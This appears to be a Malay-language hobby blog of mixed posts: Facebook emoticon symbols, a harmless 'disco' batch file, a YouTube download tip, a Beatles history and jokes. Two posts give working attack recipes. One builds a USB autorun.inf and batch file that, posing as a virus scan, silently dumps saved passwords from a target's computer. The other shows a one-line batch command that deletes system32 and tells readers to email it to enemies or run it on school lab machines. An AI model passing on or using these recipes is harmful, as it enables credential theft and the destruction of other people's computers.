Naughty Ckit(send virus)


nak jd naughty cOol???
Hantar URL Virus Ni Kat Kawan
Yang bola kat bawah ni, kalau click bola ni, HAHAHA memang kena getah ler.
Kalau nak try boleh je, ianya tak jangkit kat PC/Laptop anda


Bagi URL ni kepada mereka
- http://jom-main-bola.tk/ atau http://fc02.deviantart.net/fs70/f/20...im-d2yv060.swf
- http://blog-gila-gila.blogspot.com




p/s::xbahaya pun...

Read more >>

::Facebook Chat Simbol::

mesti ramai yg tak thu bkn cara nie???kalau thu duk snyap jew deh
Facebook Chat Symbol
Di bawah ini beberapa code/simbol yang boleh diguna pakai ketika comment atau chatting di Facebook, dan akan menjadi emoticons  . Kalau tak tahu guna,copy/paste je.

FaceBook Chat Symbols Art
Art Symbol
Description
Art Symbol
Description
ƸӜƷ
Butterfly
Peace Sign
(●̮̮̃•̃)
Panda Face
♪♫
Music Note
Cross Sign
Phone
Yin Yang
Crown
Empty Star
Full Star
Heart
Diamond
Black Heart
Cloud
Sun
Umbrella
Female
Male
♐☎☏☪☚☛☻☺
Others 1
♼♽♻♺♹♨♧
Others 2
♲♳♴♵♶☃☝☞☟♎
Others 3
_ _ ☺ђέ«{^^}»ђέ☺
Mimic
̯͡ ٩(●̮̮̃•̃)۶ ٩(-̮̮̃-̃)۶
Faces 1
⋋⏝⋌ ٩(̯͡͡)۶ ٩(-̮̮̃•̃)۶ ٩(×̯×)۶(╥_╥)
Faces 2
“”̿ ̿ ̿ ̿ ̿’̿’̵͇̿̿з=(•̪●)=ε/̵͇̿̿/’̿’̿ ̿ ̿̿ ̿ ̿”" (ˇ_ˇ’!l)
Cowboy with two guns
(•̪●)=ε/̵͇̿̿/’̿’̿ ̿ ̿̿ ̿ ̿””
Boy with a Gun
╔═══╗ ♪
║███║ ♫
║ (●) ♫ ♪
╚═══╝♪♪
Sound System Music
☻/
/▌
/\
Charlie
┌─┐ ─┐
│▒│ /▒/
│▒│/▒/
│▒ /▒/─┬─┐
│▒│▒|▒│▒│
┌┴─┴─┐-┘─┘
│▒┌──┘▒▒▒│
└┐▒▒▒▒▒▒“”
Peace Sign Hand
♥ (●̮̮̃•̃)●̮̮̮̮̃̃•̃̃)
♥ /█\ /█\
♥ ||_ ||_♥
Two Lover


FaceBook Symbols Art Styles
Description
Facebook Symbols Art styles
Face 1
⎝⏠⏝⏠⎠
Face 2
⓿⏝⓿
Face 3
⎝⎝⎲⎵⎲⎠⎠
Apple
Ѽ
Face 4
⎝⎝⏠⏝⏠⎠⎠
Hooraay!!
ƪ(‾ε‾“)ʃ
Face 5
⁰₋⁰⁻⁻⁻⁻⋋⁰⏝⁰⋌⁻⁻⁻⁻⁰₋⁰
Tape Karaoke Speaker
ılıll|̲̅̅●̲̅̅|̲̅̅=̲̅̅|̲̅̅●̲̅̅|llılı
Home
__̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡ ̡͌l̡̡̡̡.__
Face 6
_
Cigarette / Smoke / Cigar
(̅_̅_̅_̅(̅_̅_̅_̅_̅_̅_̅_̅_̅̅_̅()ڪے~ ~
Face 7
◣▂◢ ⎞⋋⏝⋌⎛
Face 8
⎝⋟⏝⋞⎠ Ơ̴̴̴̴̴̴͡.̮Ơ̴̴͡
Face 9
⎝⋆⏝⋆⎠
Face 10
⎝⋏⏝⋏⎠
Face 11
Face 12
__
ha ha hi hi ho ho he he
ã² =D î² :D ü² :> é² :p õ² =))
Love Love Love
l ̲̅ə̲̅٨̲̅٥̲̅٦̲̅]l ̲̅ə̲̅٨̲̅٥̲̅٦̲̅]l ̲̅ə̲̅٨̲̅٥̲̅٦̲̅]l
Ha ha ha
=))Haнaɑº°˚˘˚°º≈•=))нaнaɑº°˚˘˚°º≈•=))
Hwkwkwkwkw
»̶ː̗̀ω̲̮̲̅͡к̲̮̲̅͡ː̖́ː̗̀:Dω̲̮̲̅͡к̲̮̲̅͡ː̖́B)ː̗̀ω̲̮̲̅͡к̲̮̲̅͡ː̖́B)ː̗̀ω̲̮̲̅͡к̲̮̲̅͡ː̖́:Dː̗̀ω̲̮̲̅͡к̲̮̲̅͡ː̖́«̶
Ho ho ho
Ho’O:Oº°˚˚°ºo:Oohh:O
He he he
:Dħεε♥ħззħεε♥ħзз:D or ђέђέђέ«{^^}»ђέђέђέ:D
Face 13
\ε(♥♥)з/
He he he 2
°◦Hз•☺•hз•☺•hз◦°◦°
Ka ka ka
:p°˚°º◦°˚°ºªKªªKªº°˚°º◦°˚=))
Hiks Hiks
ίĸšºš§§º°˚˚°ºίĸšº°˚˚°ºš§§…… :’(:’(:’(

Read more >>

Buat Lampu Disco Mengguna Notepad


Anda mahu berdisco???hahaha..gilew mlep  
♬ ♪
♬ ♪
Anda boleh berdisco atau berjoget di dalam bilik sambil lampu di padam dengan menggunakan trick Notepad sahaja 
CARA-CARA :
1) Buka Notepad.
2) Copy & Paste code di bawah ini ke dalam Notepad.
3) Save As kepada fileanda.bat . Save Type mestilah kepada All Types.

Ni code nya :

@echo off
title Untitled - Notepad
color f0
title NOTEPAD
mode 20,2
msg * untuk hasil yang lebih gempak, Klik 2 kali di title "NOTEPAD"
echo PRESS "ENTER" NOW
pause>nul
mode con: cols=1 lines=1 >nul
mode con: cols=2 lines=2 >nul
mode con: cols=3 lines=3 >nul
mode con: cols=4 lines=4 >nul
mode con: cols=5 lines=5 >nul
mode con: cols=6 lines=6 >nul
mode con: cols=7 lines=7 >nul
mode con: cols=8 lines=8 >nul
mode con: cols=9 lines=9 >nul
mode con: cols=10 lines=10 >nul
mode con: cols=11 lines=11 >nul
mode con: cols=12 lines=12 >nul
mode con: cols=13 lines=13 >nul
mode con: cols=14 lines=14 >nul
mode con: cols=15 lines=15 >nul
mode con: cols=16 lines=16 >nul
mode con: cols=17 lines=17 >nul
mode con: cols=18 lines=18 >nul
mode con: cols=19 lines=19 >nul
mode con: cols=20 lines=20 >nul
mode con: cols=21 lines=21 >nul
mode con: cols=22 lines=22 >nul
mode con: cols=23 lines=23 >nul
mode con: cols=24 lines=24 >nul
mode con: cols=25 lines=25 >nul
mode con: cols=26 lines=26 >nul
mode con: cols=27 lines=27 >nul
mode con: cols=28 lines=28 >nul
mode con: cols=29 lines=29 >nul
mode con: cols=30 lines=30 >nul
mode con: cols=31 lines=31 >nul
mode con: cols=32 lines=32 >nul
mode con: cols=33 lines=33 >nul
mode con: cols=34 lines=34 >nul
mode con: cols=35 lines=35 >nul
title N
mode con: cols=36 lines=36 >nul
mode con: cols=37 lines=37 >nul
mode con: cols=38 lines=38 >nul
title NO
mode con: cols=39 lines=39 >nul
mode con: cols=40 lines=40 >nul
mode con: cols=41 lines=41 >nul
title NOT
mode con: cols=42 lines=42 >nul
mode con: cols=43 lines=43 >nul
mode con: cols=44 lines=44 >nul
title NOTE
mode con: cols=45 lines=45 >nul
mode con: cols=46 lines=46 >nul
mode con: cols=47 lines=47 >nul
title NOTEP
mode con: cols=48 lines=48 >nul
mode con: cols=49 lines=49 >nul
mode con: cols=50 lines=50 >nul
title NOTEPA
mode con: cols=51 lines=51 >nul
mode con: cols=52 lines=52 >nul
mode con: cols=53 lines=53 >nul
title NOTEPAD
mode con: cols=54 lines=54 >nul
mode con: cols=55 lines=55 >nul
mode con: cols=56 lines=56 >nul
title NOTEPAD D
mode con: cols=57 lines=57 >nul
mode con: cols=58 lines=58 >nul
mode con: cols=59 lines=59 >nul
title NOTEPAD DIS
mode con: cols=60 lines=60 >nul
mode con: cols=61 lines=61 >nul
mode con: cols=62 lines=62 >nul
title NOTEPAD DISC
mode con: cols=63 lines=63 >nul
mode con: cols=64 lines=63 >nul
mode con: cols=65 lines=64 >nul
title NOTEPAD DISCO
mode con: cols=66 lines=65 >nul
mode con: cols=67 lines=66 >nul
mode con: cols=68 lines=67 >nul
title NOTEPAD DISCO by : latest-worldissue.blogspot.com (syabrembo)
mode con: cols=69 lines=68 >nul
mode con: cols=70 lines=69 >nul
mode con: cols=71 lines=70 >nul
title NOTEPAD DISCO by : latest-worldissue.blogspot.com (syabrembo)
mode con: cols=72 lines=71 >nul
mode con: cols=73 lines=72 >nul
mode con: cols=74 lines=73 >nul
title NOTEPAD DISCO by : latest-worldissue.blogspot.com (syabrembo)
mode con: cols=75 lines=74 >nul
mode con: cols=76 lines=75 >nul
mode con: cols=77 lines=76 >nul
title NOTEPAD DISCO by : latest-worldissue.blogspot.com (syabrembo)
mode con: cols=78 lines=78 >nul
mode con: cols=79 lines=79 >nul
mode con: cols=80 lines=80 >nul
title NOTEPAD DISCO by : latest-worldissue.blogspot.com (syabrembo)
mode con: cols=81 lines=81 >nul
mode con: cols=82 lines=82 >nul
mode con: cols=83 lines=83 >nul
title NOTEPAD DISCO by : latest-worldissue.blogspot.com (syabrembo)
mode con: cols=84 lines=84 >nul
mode con: cols=85 lines=85 >nul
mode con: cols=86 lines=86 >nul
mode con: cols=87 lines=87 >nul
mode con: cols=88 lines=88 >nul
mode con: cols=89 lines=89 >nul
mode con: cols=90 lines=90 >nul
mode con: cols=91 lines=91 >nul
mode con: cols=92 lines=92 >nul
mode con: cols=93 lines=93 >nul
mode con: cols=94 lines=94 >nul
mode con: cols=95 lines=95 >nul
mode con: cols=96 lines=96 >nul
mode con: cols=97 lines=97 >nul
mode con: cols=98 lines=98 >nul
mode con: cols=99 lines=99 >nul
mode con: cols=101 lines=100 >nul
mode con: cols=102 lines=100 >nul
mode con: cols=103 lines=100 >nul
mode con: cols=104 lines=100 >nul
mode con: cols=105 lines=100 >nul
mode con: cols=106 lines=100 >nul
mode con: cols=107 lines=100 >nul
mode con: cols=108 lines=100 >nul
mode con: cols=109 lines=100 >nul
mode con: cols=110 lines=100 >nul
mode con: cols=111 lines=100 >nul
mode con: cols=112 lines=100 >nul
mode con: cols=113 lines=100 >nul
mode con: cols=114 lines=100 >nul
mode con: cols=115 lines=100 >nul
mode con: cols=116 lines=100 >nul
mode con: cols=117 lines=100 >nul
mode con: cols=118 lines=100 >nul
mode con: cols=119 lines=100 >nul
mode con: cols=120 lines=100 >nul
mode con: cols=121 lines=100 >nul
mode con: cols=122 lines=100 >nul
mode con: cols=123 lines=100 >nul
mode con: cols=124 lines=100 >nul
mode con: cols=125 lines=100 >nul
mode con: cols=126 lines=100 >nul
mode con: cols=127 lines=100 >nul
mode con: cols=128 lines=100 >nul
mode con: cols=129 lines=100 >nul
mode con: cols=130 lines=100 >nul
mode con: cols=131 lines=100 >nul
mode con: cols=132 lines=100 >nul
mode con: cols=133 lines=100 >nul
mode con: cols=134 lines=100 >nul
mode con: cols=135 lines=100 >nul
mode con: cols=136 lines=100 >nul
mode con: cols=137 lines=100 >nul
mode con: cols=138 lines=100 >nul
mode con: cols=139 lines=100 >nul
mode con: cols=140 lines=100 >nul
mode con: cols=141 lines=100 >nul
mode con: cols=142 lines=100 >nul
mode con: cols=143 lines=100 >nul
mode con: cols=144 lines=100 >nul
mode con: cols=145 lines=100 >nul
mode con: cols=146 lines=100 >nul
mode con: cols=147 lines=100 >nul
mode con: cols=148 lines=100 >nul
mode con: cols=149 lines=100 >nul
mode con: cols=150 lines=100 >nul
mode con: cols=151 lines=100 >nul
mode con: cols=152 lines=100 >nul
mode con: cols=153 lines=100 >nul
mode con: cols=154 lines=100 >nul
mode con: cols=155 lines=100 >nul
mode con: cols=156 lines=100 >nul
mode con: cols=157 lines=100 >nul
mode con: cols=158 lines=100 >nul
mode con: cols=159 lines=100 >nul
mode con: cols=160 lines=100 >nul
msg * selamat berjoget bro..haha!!
:1
color 10
color 20
color 30
color 40
color 50
color 60
color 70
color 80
color 90
color A0
color B0
color C0
color D0
color E0
color F0
goto 1
@exit


P/S::enjoy lah..
Read more >>

:: Hack Password cOmputer ::



Assalamualaikum...
 ♬ ♪ ♩ ♫ ♪  ♬ ♪ ♩ ♫ ♪ 
(hati gembira)
Hari ini Naz akan berkongsi dengan korang bagaimana untuk hack password komputer
sesiapa dalam mase yang sangat singkat..

Korang download semua yang kat bawah ni

Korang buka notepad dan korang copy dan paste kod yang aku bagi korang kat bawah ni.

[autorun]
open=pensil.bat
ACTION= Perform a Virus Scan 

save serta namakan sebagai autorun.inf
Selepas save korang bula notepad baru masukkan kod kat bawah ni pulak

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Dan simpan sebagai pensil.bat  dan save didalam pendrive korang..

sekarang korang dah boleh akses password orang.
Step1. Masukkan ke komputer target..
Step2.  Popup window akan keluar. dan pilih option pertama (Perform a Virus Scan).
Step3. Sekarang semua password target akan tersimmpan di fail .txt.
Step4  Tanggalkan pendrive dari komputer target. dan korang dapat lihat password  pada fail .txt

p/s: Trick ini hanya untuk recover balik password2 yang tersimpan dalam mana-mana komputer  
akan berkesan pada Windows 2000, XP and Vista sahaja window lain skill lain la keh3..
Read more >>

Hantar Virus Paling Dangerous


Annyeonghaseyo
 안녕하세요

Hari ni Naz akn mngajar korang bagaimana untuk memusnahkan mana-mana 
komputer dengan hanya menggunakan email atau internet  sahaja. Cara nya agak 
mudah dan coOL.Dimana korang boleh menjahanamkan mana2  komputer mengakibatkan
si pengguna tidak dapat switch on komputer diorang selamanya. SELAMANYA

ATTENTION PLEZZZ!!!!!!
Naz tidak akan bertanggungjawab jika terjadi apa-apa yang berlaku sama ada 
komputer korang atau computer org lain..Tujuan post ini adalah untuk berkongsi maklumat semata-mata.

Step 1 ::
 copy kod merah dekat bawah  ni

del c:\WINDOWS\system32\*.*/q

Step 2 ::
 Buka notepad dan paste kod diatas.

Step 3 ::
Simpan kod ni apa-apa nama sekalipun tetapi belakang nya mestade  ".bat "
Contoh "stupid.bat".

JANGAN SESEKALI KORANG DOUBLE KLIK DEKAT NOTEPAD yang korang simpan tu..kalau tak menyesal gilew ahh…

Step 5 ::
 korang attach dekat email untuk hantar ke musuh.

Step 6 ::
korang tulis la ape-apa sekalipun ket email untuk suruh musuh korang download
dan tekan kod tu.Ayat tu biarlah cool ckit..
Apabila musuh anda download dan buka file td. Secara automatik dan lansungnya komputer diorang akan rosak.

p/s :: Korang boleh juga menggunakan cara gilew dgn copy paste kat computer makmal skolah
          korang..mesti gempak laa


Read more >>

Download video dari youtube tanpa guna software




Ini adalah cara yang paling mudah untuk memuat turun apa-apa video dari youtube..

 Ketika memainkan video di youtube, copykan lokasi video tersebut dari address bar seperti ini:

 www.youtube.com/watch?v=sasad7657dms2

Kemudian, tambahkan perkataan 'kick' di antara www. dan youtube.com link seperti ini:


www.kickyoutube.com/watch?v=sasad7657dms2


Yup! dah siap!

korang akan dibawa ke satu laman yang lain..

muat turun aje videonya kat situ..

selesai~


Ada lagi cara lain:


1. letakkan nombor 12 di antara youtube & .com, tekan enter..

    ini akan memberi peluang kepada korang untuk muat turun video dalam format yang diingini..

2. letakkan perkataan ok di antara www. dan youtube, tekan enter..
Read more >>

The Beatles

 Siap sich yang tidak tahu dengan grup band The Beatles ? The Beatles merupakan grup band musik paling melegenda di dunia  yang sudah tidak asing lagi didunia musik.The Beatles adalah salah satu grup musik rock paling awal sekaligus paling berpengaruh di era modern. Beranggotakan John Lennon, Paul McCartney, George Harrison, dan Ringo Starr, kebanyakan lagu mereka ditulis oleh Lennon dan McCartney. Popularitas mereka sedemikian tingginya di Britania Raya sehingga di tahun 1963 pers menelurkan istilah "Beatlemania". Mereka juga kemudian meraih sukses di Amerika Serikat dan seluruh dunia.



Dibentuk di Liverpool tahun 1959 dengan formasi awal John Lennon (Vokal, Gitar), Paul Mc Cartney (Vokal, Gitar), George Harrison (Vokal, Gitar), Stuart Sutcliffe (Bass) dan Pete Best (Drum). Namun tak lama kemudian Stuart Sutcliffe mengundurkan diri (hijrah ke Jerman dan menikahi Astrid Kircherr dan meninggal disana tahun 1962 akibat pendarahan di otak). Lalu pada tahun 1962 Pete Best hengkang dari The Beatles, dan posisinya digantikan oleh Richard Starkey alias Ringo   Starr.

Manager The Beatles, Brian Eipstein, pertama kali mengenal Beatles lewat banyaknya request pembeli piringan hitam di toko musiknya. Pertama kali Brian mencoba menawarkan Beatles kepada Decca Record, label besar perusahaan rekaman kala itu. Audisi bisa didapat, hanya saja manajemen Decca berpendapat bahwa kelompok musik gitar sudah lewat masa tenarnya. Kendati keempat pemuda menjadi patah arang, Brian akhirnya bisa mendapatkan audisi bagi mereka di satu label rekaman, Parlophone, yang sejatinya adalah perusahaan rekaman untuk siaran radio. George Martin, manajer Parlophone, setuju, dan dimulailah perekaman untuk album pertama The Beatles yang bertajuk "Please Please Me". Lagu Please Please Me dan Love Me Do merupakan andalan untuk album tersebut.

The Beatles pada awalnya bernama The Quarrymen di tahun 1957. Quarrymen adalah sebuah band skiffle (band dengan menggunakan alat-alat rumah tangga, yang saat itu sedang tren di Liverpool) yang beranggotakan Lennon dan teman-temannya di Quarry Bank Grammar School. Di tanggal 6 Juli 1957, Quarrymen tampil pada sebuah acara gereja di Gereja St. John, Woolton. Di acara inilah Lennon pertama kali bertemu dengan Paul McCartney, yang saat itu menonton penampilan Quarrymen. McCartney sangat kagum akan penampilan band tersebut, dan lalu menghampiri Quarrymen di belakang panggung, ditemani temannya Ivan Vaughan yang juga teman Lennon.

Tak lama kemudian, McCartney bergabung dengan Quarrymen. Lennon dan McCartney menjadi sangat dekat, dan sering terlihat bersama. Keduanya terlibat dalam rasa 'senasib' karena keduanya kehilangan ibu mereka di masa mudanya. McCartney juga kehilangan ibunya karena kanker, saat usianya 15 tahun. Lennon dan McCartney mulai menulis lagu bersama maupun sendiri-sendiri. Salah satu lagu yang dihasilkan pada masa-masa ini adalah 'Hello Little Girl' yang kemudian menjadi hits oleh The Fourmost di tahun 60an.

Kemudian, McCartney memperkenalkan temannya, George Harrison, yang setahun lebih muda daripadanya kepada Lennon. Harrison yang piawai bermain gitar pun berkeinginan bergabung dengan Quarrymen. Lennon, yang pada awalnya keberatan karena Harrison dinilai terlalu muda, akhirnya pun setuju setelah dibujuk McCartney. Bergabungnya Harrison disusul oleh Stuart Sutcliffe, sahabat Lennon di Sekolah Seni, yang menjadi basis. Sutcliffe sebenarnya tidak dapat bermain bas, namun Lennon bersikeras untuk mengajaknya ikut dengan Quarrymen. Quarrymen pertama kali merekam suara mereka dalam lagu "That'll be the Day", lagu Buddy Holly, dan "In Spite of All The Danger", sebuah instrumental karangan McCartney dan Harrison. Kedua lagu ini, bersama lagu-lagu yang belum dirilis sebelumnya, kemudian dirilis secara resmi di tahun 1994, lewat album The Beatles Anthology.

Quarrymen dalam perjalanannya beberapa kali mengganti nama, dan personel-personelnya datang dan pergi. Band itu kemudian bernama 'The Beatles', nama yang konon ditemukan oleh Lennon. Allan Williams menjadi manajer mereka, dan pada tahun 1960 ia berhasil memperoleh kontrak dengan sebuah klab di Hamburg. Band ini pun kemudian pergi ke Hamburg, beranggotakan John Lennon, Paul McCartney, George Harrison, Stuart Sutcliffe, dan Pete Best. Best adalah drummer mereka saat itu. Di Hamburg, The Beatles tampil setiap malam di klab malam yang kotor, dan tinggal bagai pengamen di penginapan kecil di dekatnya. Namun kemudian mereka dideportasi dari Hamburg, karena George Harrison masih di bawah umur untuk bekerja di sana.

Sekembalinya ke Liverpool, mereka tampil di Cavern Club. Di klab inilah The Beatles menjadi sangat terkenal di Liverpool, setiap show mereka selalu ramai dan panjang antriannya. Namun tak lama kemudian, di paruh akhir tahun 1961, The Beatles kembali ke Hamburg dan merekam 'My Bonnie' bersama Tony Sheridan. Stuart Sutcliffe memilih untuk tetap di Hamburg bersama pacarnya, Astrid Kircherr, ketika The Beatles akan pulang ke Liverpool. Maka McCartney mengambil alih bass. Beberapa bulan kemudian, Sutcliffe wafat di Hamburg karena gangguan otak.

The Beatles kembali tampil secara rutin di Cavern Club. Di klab ini, pada bulan November 1961, untuk pertama kalinya Brian Epstein menyaksikan penampilan band ini. Epstein adalah pemilik toko musik North End Music Store (NEMS) di Liverpool, yang mengenal The Beatles karena seorang pelanggannya menanyakan rekaman 'My Bonnie' yang direkam band ini bersama Tony Sheridan. Epstein terpesona melihat penampilan The Beatles, dan kemudian menjadi manajer band ini. Epstein menawarkan tape demo The Beatles ke studio-studio rekaman, dan berulang kali ditolak, seperti di Decca Records.

Akhirnya The Beatles diterima di Parlophone Records, label yang ada di bawah pengawasan EMI, dengan produsernya George Martin. Syarat yang diberikan Martin adalah mengganti drummer mereka, Best, yang dianggap kurang kompeten. Best kemudian diganti oleh Ringo Starr (nama aslinya Richard Starkey), drummer asal Liverpool yang sebelumnya bergabung dengan Rory Storm & the Hurricanes. The Beatles meluncurkan singel 'Love Me Do' yang langsung mencapai nomor 17 di tangga lagu Inggris. Singel mereka yang kedua, 'Please Please Me', menjadi singel pertama mereka yang mencapai peringkat teratas di tangga lagu.

Kesuksesan ini terus berlanjut. Nyaris semua singel mereka mencapai peringkat teratas di tangga lagu Inggris, namun 'I Wanna Hold Your Hand' di tahun 1964 adalah singel pertama yang berhasil menembus industri musik Amerika Serikat, sekaligus mengawali apa yang disebut sebagai 'British Invasion'. Sejak saat inilah musik The Beatles tersebar ke seluruh dunia, meraih sukses di mana-mana, terkenal di setiap penjuru. Konser mereka selalu dipadati fans yang sangat fanatik, yang mengejar-ngejar band ini ke mana pun mereka pergi. Teriakan fans membuat The Beatles bahkan tidak dapat mendengarkan suara mereka sendiri di atas panggung.

Di tahun 1966, akhirnya The Beatles memutuskan untuk berhenti mengadakan konser. Selain karena begitu ributnya penonton sehingga musik mereka menjadi tidak terdengar jelas, musik The Beatles juga telah menjadi amat berkembang sehingga tidak dapat dimainkan secara langsung dengan teknologi pertunjukan live di masa itu. Keputusan ini ditanggapi secara luas di dunia, yang menyangsikan kelanjutan band ini. Namun The Beatles menjawabnya dengan album Sgt. Pepper's Lonely Hearts Club Band di tahun 1967, yang hingga kini masih diakui banyak kalangan sebagai salah satu album terbaik sepanjang masa.



Setelah kematian Epstein di tahun 1967, Lennon adalah orang yang tidak senang akan tindakan McCartney yang mengambil alih kepemimpinan band itu. Ia membenci proyek-proyek yang dipimpin McCartney, seperti film Magical Mystery Tour dan Let It Be. Lennon juga menjadi orang yang pertama kali melanggar kesepakatan awal The Beatles, yaitu untuk tidak membawa istri dan pacar pada proses rekaman, dengan membawa Yoko Ono dalam proses pembuatan album White Album di tahun 1968. Lennon juga orang yang pertama menyatakan ingin keluar dari The Beatles.

Setelah band ini bubar di tahun 1970, perseteruan antara Lennon dan McCartney terus berlanjut. Salah satunya adalah Lennon kesal karena McCartney mendahuluinya dalam menyatakan bubarnya The Beatles. Lennon, Harrison dan Starr juga melawan McCartney di pengadilan dalam membubarkan band ini.

Sumber :http://sudarmudji.blogspot.com/
Read more >>

Ayat Yang Kena Lempang



Lihat beberapa contoh ayat yang boleh menyebabkan kita dilempang  kiri dan kanan secara pergi dan balik atau sekurang-kurangnya di luku beberapa kali..

1.
 " Mak tak suke jantan tu..ko jangan kawin lari pulak Fasha ?".
" Ha..kawin lari berapa meter tu mak..100 meter atau lompat berpagar !! " .

2.
 " Fazrin semalam lari tak cukup tanah kena kejar dek lembu semalam ko tau "..
"  Jangan nak temberang la Fahmi..tanah kan main banyak ..cuba ko lari dari sini sampai KL..kan tanah saje"

3.
' Bunga tayar ko tak de ni..botak dah ni.. "
"Nantilah aku suruh botak beli bunga  letak kat tayar aku tu..bunga Rose ko rasa cantik tak ? ".

4.
 ' Ko jangan jadi lembu dicucuk hidung Mazlan..malu mak !! "
Lembu sape kena cucuk hidung tu mak? Dia nak bubuh anting-anting ke ?

5.
 " Eh..ramai ni ..anak buah sape ni Mak Su ".
Ala..anak buah timun, pisang dan keladi ..tu yang kuning  sikit tu anak buah langsat.. 

6.
 " Kita kena cari jalan ni..macam mana nak selesaikan masalah ni "..
Ko bute ker..depan tu bukan jalan !!!..

7.
 " Patutnye ko ikut macam Fazrin tu..dialah jadi tulang belakang keluarga skrg ni.. bukan  cam ko.."
" Agak selama ni Fazrin tu tak de tulang belakang ye mak...?? ..

8.
 " Ko jangan meninggi diri ngan Pak Long Ko..tak baik .."
" Memanglah mak..saya lebih tinggi dari Pak long..tak kan saya nak duduk lak bila jumpa dia"..

9.
" Murah hati betul Fahmi tu..tak sangke " ..
" Kat kedai mana tu..saya memang minat makan hati ni..kira berapa sekilo..murah sangat ke ?

10.. 
Tiada..he..he..
Read more >>

first time post



tak tahu la nk taip ape...coz nie la post first time aku..hu3
sory la kalau buat korang meluat..pning jg ahh nk tulis nie..ha4
ini la blog aku 'stupid cool'
ape mkne aku tak thu..nnti la lpas nie aku post bnda yg lbih cool agy.
Read more >>
Get widget here

..Recent pOst..

get this widget here
Powered by Blogger.